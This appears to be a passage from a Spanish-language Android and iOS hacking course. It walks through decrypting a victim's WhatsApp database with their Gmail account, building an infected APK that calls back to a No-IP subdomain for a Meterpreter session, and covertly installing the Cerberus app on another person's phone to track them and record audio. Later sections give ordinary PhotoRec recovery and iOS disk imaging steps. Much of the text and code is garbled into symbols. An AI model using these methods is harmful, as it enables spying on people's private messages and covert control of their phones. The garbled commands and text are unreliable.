Gonzalo Snchez Surez - Drummer Wolf 49 Hackeo de dispositivos iOS y Android
Para las versiones mas nuevas de Whatsapp la base de datos se encuentra encriptada de forma diferente y esta tiene una terminacin .crypt5 Para lograr desencriptarla usaremos un scrypt en python , sin embargo, para que este tenga xito ser necesario que sepamos la cuenta gmail asiociada a la terminal android Para usarlo es tan sencillo como invocarlo as:
- python pwncrypt5.py msgstore.db.crypt5 (cuenta de la vctima)@gmail.com > msgstore.sdb
Y finalizo con el codiciado cdigo:
pwncrypt5.py
Gonzalo Snchez Surez - Drummer Wolf 50 Hackeo de dispositivos iOS y Android !"#$%&#'()#*+,-.) """ #$%&'( )*+(+,'(- $.............................................../000 123'(4)) 5(6('7*+ 8*9)': ;+8*9)'7* %9 6*%,<= 3,; ,>??(>% $.............................................../000
Gonzalo Snchez Surez - Drummer Wolf 51 Hackeo de dispositivos iOS y Android Una de las alternatvas para poder desencriptar la base de datos es usando el sitio web https://www.recovermessages.com el cual har todo el proceso por nosotros, sin embargo, si queremos ver la base de datos completa ser necesario hacer un pequeo pago. S| buscan un mtodo mas fc|| para desencr|ptar Se ha sacado esLa muy uLll herramlenLa para desencrlpLar las bases de whaLsapp con Lermlnacln .cryp3 compaLlble con Wlndows La descargaremos del slgulenLe enlace hLLps://glLhub.com/andreas- mausch/whaLsapp-vlewer/releases/download/v1.3/WhaLsApp.vlewer.zlp una vez descargado el e[ecuLable, coplaremos nuesLra base de daLos obLenlda denLro de la mlsma carpeLa, e[ecuLaremos el programa, cllck en flle>open y selecclonaremos el archlvo
Gonzalo Snchez Surez - Drummer Wolf 52 Hackeo de dispositivos iOS y Android Lscr|b|remos |a cuenta asoc|ada a |a term|na| andro|d y de esa forma podremos abr|r e| arch|vo
L|sto! Nuestra base de datos ha s|do desencr|ptada y ||sta para ser |e|da
Gonzalo Snchez Surez - Drummer Wolf 53 Hackeo de dispositivos iOS y Android Lxp|otac|n kemota (tutor|a| por Iuan Ange| Csor|o Iuarez m4ku4z)2 La exploLacln 8emoLa conslsLe en poder lnfecLar un dlsposlLlvo androld , no lmporLa en que esLado de la republlca o pals se encuenLre , con esLe Llpo de exploLacln podremos obLener la sesln de meLerpreLer" remoLa. Conoc|endo nuestra |nfraestructura (proveedor de serv|c|o , Modem , Ve|oc|dad de conex|n) ara poder hacer la exploLacln remoLa debemos conocer blen nuesLra lnfraesLrucLura de red y de proveedor de servlclo de lnLerneL. -Modem modelo y conocer la enLrada al panel de la conflguracln -Lthernet o WIII? Cable r[43 o lnalmbrlco -Conex|n ue forma opclonal debemos hacer una prueba de conexln para saber a cuanLos megas navegamos. Suponlendo que conLamos con un modem 2wlre de 1elmex y conoclendo que es lnalmbrlco , procederemos a abrlr los puerLos medlanLe una sencllla conflguracln.
Gonzalo Snchez Surez - Drummer Wolf 54 Hackeo de dispositivos iOS y Android
or lo regular la conflguracln del modem es a Lraves de la lp 192.168.1.234" (obvlamenLe debemos esLar conecLados) Abrlmos nuesLro navegador y nos dlrlglmos a la dlreccln 192.168.1.234" en algunos mdems nos pedlr el usuarlo , el cual es 1elmex" y la conLrasena es la clave wep".
Gonzalo Snchez Surez - Drummer Wolf 55 Hackeo de dispositivos iOS y Android Ingresamos a |a adm|n|strac|n de| modem .
Lntramos a |a conf|gurac|n de "8|oqueo de Intrusos".
Gonzalo Snchez Surez - Drummer Wolf 56 Hackeo de dispositivos iOS y Android Ln esLe e[emplo la compuLadora del lado derecho llamada Makuaz- rlvaLe" es la que esLa conecLada a la red , ahl puede ser Lu equlpo y debes ldenLlflcarlo con el nombre que le hayas puesLo a Lu pc .
Lsco[emos "erm|t|r todas |as Ap||cac|ones (modo DM2p|us (2ona desm|||tar|zada), y damos aceptar.
Gonzalo Snchez Surez - Drummer Wolf 57 Hackeo de dispositivos iOS y Android
Una vez hecho esto ke|n|c|amos e| modem para que se ap||quen |os camb|os.
Gonzalo Snchez Surez - Drummer Wolf 58 Hackeo de dispositivos iOS y Android una vez relnlclado vamos a verlflcar que dlreccln lp Lenemos con la ayuda de google y la slgulenLe paglna : hLLp://www.cual-es-ml-lp.neL Ahora Cop|amos y pegamos en nuestro navegador , y por e[emp|o en m| caso esta ab|erto e| puerto para m| NAS.
Con esLo ya Lenemos Lodos los puerLos ablerLos , pero que pasa sl relnlclo ml modem y/o se va la luz? , es claro que la lp va a camblar y la
Gonzalo Snchez Surez - Drummer Wolf 59 Hackeo de dispositivos iOS y Android exploLacln remoLa ya no funclonara ya que el apk lnfecLado apunLa a una lp en especlflco y como ya no Lenemos esa lp apunLando hacla nuesLra pc y modem , de[ara de funclonar. 3.6.2.-Conoc|endo e| Serv|c|o No-|p + creac|n y conf|gurac|n de nuestro modem Ll Servlclo no-lp nos proporclona un subdomlnlo para poder uLlllzar nuesLra lp , no lmporLando sl cambla. Ll reglsLro es basLanLe senclllo a Lraves de su paglna . hLLp://www.nolp.com una vez reglsLrado accede a add-hosL" Lscoges el nombre e[emplo: apk_zombles" y el subdomlnlo que gusLes del lado derecho y da cllc en Add PosL" y llsLo ya Llenes un subdomlnlo graLls apunLando a Lu lp y Lu pc.
Gonzalo Snchez Surez - Drummer Wolf 60 Hackeo de dispositivos iOS y Android 3.7.-Lxp|otac|on 100 remota. una vez que Lenemos conflgurado el modem en modo uMZ y el servlclo no-lp apunLando a nuesLro modem y pc , vamos a crear el apk lnfecLado .... ero esLa vez en vez de poner lp vamos a poner el subdomlnlo de no- lp. una vez en la carpeLa de lnsLalacln de MeLasplolL usaremos el slgulenLe comando ;2(<=>?@ABC@D @EDFCGD(<HIHF?FHIHF(FHJHF=H#IK? $L%M/N!"#$%&'$()%* !" $"%./N",-./% . O (.,/'(EC<PFH#DH#B@#@??2@?QR ;2(<=>?@ABC@D @EDFCGD(<HIHF?FHIHF(FHJHF=H#IK? $L%M/N@?Q#SC<PGH=2DC<GEGC2EC* G?2KC< $"%./N897: . O (.,/'(T@KQGEU#<HVGKC2@?QR y llsLo segulmos los pasos anLerlores.
Gonzalo Snchez Surez - Drummer Wolf 61 Hackeo de dispositivos iOS y Android TEMA 3 Protegiendo tu Android contra robo Como algunos usuarios sabrn existen algunas apps dentro de la Play Store que sirven para proteger nuestro equipo Android contra prdida o robo dndonos una serie de opciones que nos permiten desde localizar geogrficamente nuestro Smartphone hasta borrarlo de forma remota. En este caso hablar un poco sobre una aplicacin en especial que debido a su amplio repertorio de funciones nos podra llegar a servir en un momento determinado para fines no tan buenos como para los que fue creada. Su nombre es cerberus y est disponible de manera gratuita dentro de la Play Store.
Si nos ponemos a darle un recorrido a las funciones de la aplicacin podremos encontrar una amplia lista dentro de la que destacan:
Tiene tres maneras de proteger su dispositivo: - Via control remoto a travs de la pgina web www.cerberusapp.com - Via control remoto a travs de de mensajes de textos SMS - SIM Checker (para los dispositivos que tienen una tarjeta SIM): recibir automticamente alertas si alguien utiliza su telfono con una tarjeta SIM no autorizada El control remoto le permite realizar muchas operaciones en el dispositivo, como: - Localizar y rastrear su dispositivo - Iniciar una fuerte alarma, incluso si el dispositivo est en modo silencioso
Gonzalo Snchez Surez - Drummer Wolf 62 Hackeo de dispositivos iOS y Android - Borra la memoria interna y de la tarjeta SD - Ocultar Cerberus del menu de las aplicacines - Bloquear el dispositivo con un cdigo - Grabar audio desde el micrfono - Obtener una lista de los ltimas llamadas enviadas y recibidas - Obtener informacin sobre la red y el operador a cual el dispositivo est conectado - Y mucho mas!
Sin embargo, todas estas funciones tan tiles no son grtis. El nico requerimiento para poder explotar todo el potencial de la aplicacin es mediante el NICO pago de 2.99! vendra siendo el equivalente a $54 pesos mexicanos, este ser el nico pago que se tendra que hacer para la creacin de la cuenta y esta es de por vida. A continuacin se muestran algunos ejemplos de la app en accin.
Gonzalo Snchez Surez - Drummer Wolf 63 Hackeo de dispositivos iOS y Android
Toda la informacin del dispositivo puede ser vista mediante la pgina web de www.cerberusapp.com y esta a su vez mandar correos al que se us para el registro
Ahora, que pasara si esta aplicacin se la instalaras al telfono de alguna persona cercana o no tan cercana a ti? Te imaginas la serie de posibilidades que podras tener sobre un dispositivo de forma remota Como he dicho anteriormente, las herramientas pueden ser utilizadas para buenos o malos fines, simplemente se trata de que tan creativo sea uno para lograr sus objetivos y la ingeniera social que apliquen.
Gonzalo Snchez Surez - Drummer Wolf 64 Hackeo de dispositivos iOS y Android MODULO 3: Recuperacin de datos mediante consola 1.-Conoclendo el SofLware hoLo8ec"
Ls un sofLware dlsenado para recuperar archlvos perdldos lncluyendo vldeos, documenLos y archlvos de los dlscos duros y Cu8oms asl como lmgenes perdldas (por eso el nombre hoLo8ecovery) de las memorlas de las cmaras foLogrflcas, M3 players, enurlves, eLc. hoLo8ec lgnora el slsLema de archlvos y hace una busqueda profunda de los daLos, funclonando lncluso sl su slsLema de archlvos esL muy danado o ha sldo re-formaLeado.
Gonzalo Snchez Surez - Drummer Wolf 65 Hackeo de dispositivos iOS y Android ulsponlblldad :
2.-lnsLalaclon y creacln de Allas (slsLemas CperaLlvos 8asados en unlx) uuranLe el curso se enLrega el sofLware phoLorec" para su lnsLalacln , solo de debe colocar en la carpeLa deseada. L[emplo en CSx :
Gonzalo Snchez Surez - Drummer Wolf 66 Hackeo de dispositivos iOS y Android Como se observa fue colocada en la carpeLa Apllcaclones" de CSx Colocar la carpeLa en la ruLa deseada para su uso. L[ecuc|n en W|ndows : uoble Cllck en phoLorec_wln.exe (32 y 64 blLs) L[ecuc|n en CSk : ./phoLorec (esLar oslclonado en la carpeLa de lnsLalacln) Comando compleLo : Mac8ook-ro-de-Conzalo:phoLorec urummerwolf$ sudo .]photorec
L[ecuc|n en L|nux : en unlx/Llnux/8Su, se neceslLa ser rooL para e[ecuLar hoLo8ec (e[. sudo LesLdlsk-6.9/llnux/phoLorec_sLaLlc)
Gonzalo Snchez Surez - Drummer Wolf 67 Hackeo de dispositivos iOS y Android
Creac|n de un a||as (s|stemas basados en un|x) Para la creacin de un alias se seguirn los mismos pasos de la pgina 33 que se usaron para la instalacin de adb bundle 3.-erdlendo/8orrando uaLos en una uS8/Puu uuranLe esLe e[erclclo conLamos con una Memorla uS8 marca klngsLon y borraremos archlvos denLro de ella. borrndolos :
Gonzalo Snchez Surez - Drummer Wolf 68 Hackeo de dispositivos iOS y Android
"#$%&'(#)* +*,-.$/ 012.,#
4.-Anallzando los uS8 monLados en nuesLras compuLadoras Abrlmos nuesLra consola o Lermlnal , y verlflcamos cual es el nombre que se le ha aslgnado a la usb : L[emp|o en CSk : Mac8ook-ro-de-Conzalo: $ df -h
noLa : hay muchos comandos en lnLerneL , slmplemenLe uLlllze el comando df-h para ver las parLlclones y verlflco que esLa Pm_uS8" es la que qulero LesLear.
Gonzalo Snchez Surez - Drummer Wolf 69 Hackeo de dispositivos iOS y Android L[emp|o en L|nux : Pay muchas maneras de hacerlo dependlendo la dlsLrlbucln que Lengas. Ln esLe caso hemos usado el comando mounL" y vemos los dlsposlLlvos monLados por el slsLema .
L[emp|o en W|ndows : 1an senclllo como enLrar > lnlclo > ml C , y llsLamos las unldades ... con la vlsLa
Gonzalo Snchez Surez - Drummer Wolf 70 Hackeo de dispositivos iOS y Android 4.1.-8ecuperando los uaLos SlsLemas basados en unlx : Abrlmos nuesLra Lermlnal o consola y escrlblmos el allas que hemos aslgnado , sl no hemos creado el allas pues solamenLe e[ecuLamos asl : ./phoLorec" Ln esLe e[emplo usare el comando phoLorec" el cual corresponde al allas que yo he aslgnado. Lnsegulda deber aparecer una Lermlnal como esLa:
Como se puede Cbservar se llsLan los dlsposlLlvos uS8 y de ulsco uuros conecLados , prevlamenLe se ha observado la usb conecLada y su nombre aslgnado. Ln esLe e[emplo el nombre que se le ha aslgnado a la usb es : /dev/rdlsk2" Selecclonamos el dlsposlLlvo con las flechas del Leclado y damos enLer para que se acclone la opcln proceed:
Gonzalo Snchez Surez - Drummer Wolf 71 Hackeo de dispositivos iOS y Android
A conLlnuacln se nos despllega una panLalla slmllar a esLa donde se nos deLalla la Labla de parLlclones (faL32) que Llene y el nombre que le hemos aslgnado (l8AlS_MM).
Lscogemos en la parLe de aba[o [Search]". Ahora se nos muesLra una panLalla donde se nos pregunLa el Llpo de parLlcln con la que cuenLa la usb o el dlsco duro. hoLorec neceslLa saber que parLlcln Llene y nos muesLra en la parLe de arrlba el Llpo de parLlcln que Llene , en esLe caso escogeremos lA1/n1lS/PlS+/8elserlS/..."
Gonzalo Snchez Surez - Drummer Wolf 72 Hackeo de dispositivos iOS y Android Ln la slgulenLe panLalla escogemos la opcln [Whole]" para que busque en Loda la parLlcln del usb o dlsco duro.
Se nos pregunLara donde deseamos que ponga los archlvos recuperados. Ln esLe caso he preparado una carpeLa llamada rescaLe_usb" en ml dlsco duro secundarlo para que ahl los deposlLe. ara flnallza Lecleamos la leLra C" para declrle al sofLware que el desLlno es el correcLo. ? con esLo empleza el roceso de 8ecuperacln en Segundo lano.
Gonzalo Snchez Surez - Drummer Wolf 73 Hackeo de dispositivos iOS y Android Solo nos resLa esperar a que Lermlne el roceso por compleLo. 3.-Anallsls de uaLos Anallzaremos los archlvos recuperados. ulrecLorlos 8ecuperados
M3 : 8ecuperados
"#$%&'(#)* +*,-.$/ 012.,#
lmgenes 8ecuperadas :
Gonzalo Snchez Surez - Drummer Wolf 74 Hackeo de dispositivos iOS y Android
Archlvos 8ecuperados :
Archlvos Compresos :
Gonzalo Snchez Surez - Drummer Wolf 75 Hackeo de dispositivos iOS y Android Wlndows : L[ecuLamos phoLorec_wln.exe"
racLlcamenLe son los mlsmos pasos que en los slsLemas basados en unlx asl que segulremos los pasos anLerlores.
Gonzalo Snchez Surez - Drummer Wolf 76 Hackeo de dispositivos iOS y Android ANLISIS FORENSE A UN DISPOSITIVO iOS En la realizacin de esta prueba se utilizar un iPod touch 2g de 8gb de capacidad
Si has perdido archivos e informacin dentro de tu iOS es posible recuperarlas y lo nico que necesitaremos ser lo siguiente: - Dispositivo iOS con Jailbreak - OpenSSH instalado en iOS - Terminal instalada en iOS - Servidor SSH instalado y configurado en tu computadora - Utilidad DD instalada en tu computadora (viene preinstalada en la mayora de los sistemas basado en UNIX) - Photorec instalado en tu computadora - Conexin wifi Pasos: -Desactivamos el autolock en el dispositivo iOS (configuracin>general>Auto- lock>seleccionar nunca -Conectamos nuestro iOS a su cargador de corriente -Abrimos la terminal de nuestro iOS -Usamos el comando su para tener permisos de superusuario -Ejecutamos dd if=/dev/disk0 | ssh usuario@ip_computadora 'dd of=ipod.img' -En donde usuario ser la cuenta de nuestra computadora que recibir el archivo -Ip_computadora nuestra direccin ip
Gonzalo Snchez Surez - Drummer Wolf 77 Hackeo de dispositivos iOS y Android -Este comando es case sensitive, favor de introducirlo correctamente -No confundan dd if= con dd of= de lo contrario podran reescribir la memoria de su iOS -Una vez iniciado el proceso este puede tardar horas, ser cosa de ser paciente y esperar a que termine
En este caso se nos gener un archivo de imagen de 8gb aprox de tamao
Pasaremos a hacer el anlisis de la imagen de disco para lo cual teclearemos en nuestra consola (de forma directa si tenemos el alias de photorec previamente creado) sudo photorec /ruta_del_archivo.img
Gonzalo Snchez Surez - Drummer Wolf 78 Hackeo de dispositivos iOS y Android
Como se pueden dar cuenta, el proceso para recuperar los datos ser el mismo que utilizamos para el de una usb normal
Gonzalo Snchez Surez - Drummer Wolf 79 Hackeo de dispositivos iOS y Android
Una vez finalizado el proceso tendremos nuestros archivos recuperados y solo necesitaremos analizarlos:
Guía De Hacking De Computadora Para Principiantes: Cómo Hackear Una Red Inalámbrica Seguridad Básica Y Pruebas De Penetración Kali Linux Su Primer Hack